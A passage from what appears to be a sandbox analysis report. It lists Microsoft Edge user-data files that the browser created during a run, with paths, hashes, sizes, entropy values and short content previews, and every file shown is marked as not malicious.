SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10256531216745095
Encrypted:	false
SSDEEP:	12:+txBEtxB75spEjVl/PnnnnnnnnnnnvoQ/Eou:+DBEDBOoPnnnnnnnnnnnv1j
MD5:	7210447E67A772EB1AF498150EEF8EC6
SHA1:	4B6740DF1EDBD085C292FDDE974704674030CCE2
SHA-256:	955E5CC6CDE9FD45A22AB990E18053C88F47E33911E46E6D60C562E8828AC337
SHA-512:	6547C6C6647F6DFFD904F2FBFD01778834A22BECD9CF3A9A79E8E18CC98A1C4DDFD66EE712170E3FAC453CF4C2EA4E9677B5E2C18D9D672FDD6263784F95F0D4
Malicious:	false
Preview:	..-.............M........' n...,$J...V.....k.....-.............M........' n...,$J...V.....k...........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	317272
Entropy (8bit):	0.8880257339553403
Encrypted:	false
SSDEEP:	384:hl2gBI3XnAQcn4oEnS9XnC9J4neu1nxjQoh8nVZy/nneNg1xn3Tv8MuyRgygw9yE:hpSA141SBCn4e6xIVWnJ3MID
MD5:	3A7E811B39324A8282AF180CD050328B
SHA1:	8F6A05A5B73101421F28CC87BADC7E6D23FBF56E
SHA-256:	859613CE221DC0BFF1594DDE64D06808C2FE34D91B8B0E02607AF7794D162A6B
SHA-512:	BA352F5BB943D43E6DD42D4A6DEF10B25CC592BE01FA9B1A7BF2E58EB7A9A07011FC7B71CD79260A9669D4ABCD7AE47EDFFFE32AE6715064D6C9E6177ACF7F7B
Malicious:	false
Preview:	7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	694
Entropy (8bit):	3.5297684238142235
Encrypted:	false
SSDEEP:	12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuBqillRfPi8u:pHayyplpu
MD5:	68FED9CDDA48FA948775EC9A2E610E03
SHA1:	DEB07FA0D66EA17FC11F18D9E009E77616CE006E
SHA-256:	CDB7A43CBA1493031003C70FD9E1E24D08E07B1ACFA82E64976D266C78483F43
SHA-512:	08D9002480C903EFD17D424434B88211ECCDB6439ECCA093B6ADBFAE13BBD107ABA604597C2F02B21AD746EB43B36BEA491469D8FDF93FF5DC88F7129CC78AFF
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................s-;...............#38_h.......6.Z..W.F.....R.......R............V.e.................@?.0................39_config..........6.....n ....1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.156491236960676
Encrypted:	false
SSDEEP:	6:HGJ9uNl/Iq2PN723oH+TcwtfrK+IFUt8YGJ9ujfwFZZmw+YGJ9ubkwON723oH+Tp:nJIvVaYeb23FUt8JFZ/+k5OaYeb3J
MD5:	B205FFD4F1379EB4C9C4EC9214A3DC5D
SHA1:	CEE9ED9E4B1CDEAD87C4C50D7DD297595069FEDB
SHA-256:	66D1D97FC2B2B537F9117C3F2CBE918F8AAA23485962AFB82D9B648EA5EFBBB1
SHA-512:	C627B1178290049AC3CB94B0BA33B974754C1BB1B1887F494862B97D8868C207CCAF457A7C490D67CE6F30EBDDE40501ADBDC0648B8B14FA086D9D75062B87E5
Malicious:	false
Preview:	2024/11/23-01:09:32.783 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/23-01:09:32.803 1ce0 Recovering log #3.2024/11/23-01:09:32.804 1ce0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.156491236960676
Encrypted:	false
SSDEEP:	6:HGJ9uNl/Iq2PN723oH+TcwtfrK+IFUt8YGJ9ujfwFZZmw+YGJ9ubkwON723oH+Tp:nJIvVaYeb23FUt8JFZ/+k5OaYeb3J
MD5:	B205FFD4F1379EB4C9C4EC9214A3DC5D
SHA1:	CEE9ED9E4B1CDEAD87C4C50D7DD297595069FEDB
SHA-256:	66D1D97FC2B2B537F9117C3F2CBE918F8AAA23485962AFB82D9B648EA5EFBBB1
SHA-512:	C627B1178290049AC3CB94B0BA33B974754C1BB1B1887F494862B97D8868C207CCAF457A7C490D67CE6F30EBDDE40501ADBDC0648B8B14FA086D9D75062B87E5
Malicious:	false
Preview:	2024/11/23-01:09:32.783 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/23-01:09:32.803 1ce0 Recovering log #3.2024/11/23-01:09:32.804 1ce0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	816
Entropy (8bit):	4.0647916882227655
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
MD5:	3BE72D8D40752B3A97028FDB2931FABA
SHA1:	A27EA4726857A948F0A4B074062B674469A9A371
SHA-256:	3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
SHA-512:	8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.156390058412235
Encrypted:	false
SSDEEP:	6:HGJ9uNXq2PN723oH+TcwtfrzAdIFUt8YGJ9uN1FZZmw+YGJ9uN1FzkwON723oH++:nXvVaYeb9FUt8+PZ/++Pz5OaYeb2J
MD5:	A5E59C77D37DF5CCD0DE97FA825985F9
SHA1:	C8A695571B8A45027348B51AFC5BBE30138D23A3
SHA-256:	CF5268B9B859E76EBC3B5D6E13206469010A615D14853A4C8FA0850244E64396
SHA-512:	B6EA8A94E5BE6B310F109D47E42F530F7A64CAA12A695C166E7BE1B1757C96BE03C9E0DAEDC24ED936EB84C12B8C8D1617A13A1ED4666521D342FA0172E57B73
Malicious:	false
Preview:	2024/11/23-01:09:32.780 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/23-01:09:32.781 1ce0 Recovering log #3.2024/11/23-01:09:32.781 1ce0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.156390058412235
Encrypted:	false
SSDEEP:	6:HGJ9uNXq2PN723oH+TcwtfrzAdIFUt8YGJ9uN1FZZmw+YGJ9uN1FzkwON723oH++:nXvVaYeb9FUt8+PZ/++Pz5OaYeb2J
MD5:	A5E59C77D37DF5CCD0DE97FA825985F9
SHA1:	C8A695571B8A45027348B51AFC5BBE30138D23A3
SHA-256:	CF5268B9B859E76EBC3B5D6E13206469010A615D14853A4C8FA0850244E64396
SHA-512:	B6EA8A94E5BE6B310F109D47E42F530F7A64CAA12A695C166E7BE1B1757C96BE03C9E0DAEDC24ED936EB84C12B8C8D1617A13A1ED4666521D342FA0172E57B73
Malicious:	false
Preview:	2024/11/23-01:09:32.780 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/23-01:09:32.781 1ce0 Recovering log #3.2024/11/23-01:09:32.781 1ce0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.6612262562697895
Encrypted:	false
SSDEEP:	3:NYLFRQZ:ap2Z
MD5:	B64BD80D877645C2DD14265B1A856F8A
SHA1:	F7379E1A6F8CE062E891C56736C789C7EA77CD6A
SHA-256:	83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
SHA-512:	734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
Malicious:	false
Preview:	117.0.2045.55

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF397ad.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF397bd.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39991.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c063.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4076e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4aa75.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08976990039127
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMWkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn15kzItSmd6qE7lFoC
MD5:	A9C670F3E70FE9EEACE55DA5EA7E1499
SHA1:	E23F7EA6021DD93F7EEB009C6CC26F67B8C93023
SHA-256:	BD3F4BB700E3836A21A841B550F7DEE85E5DFAEA5E7A450088C9ED81496BB8EF
SHA-512:	DE58E7275B9A35353D294C78EDC51E88E3F5E22BF145F9C6885A2409793C46BA5D85571552EA60A624F1F942F03F617C19F24328C5ACCE3202E71695CF0A2E81
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4B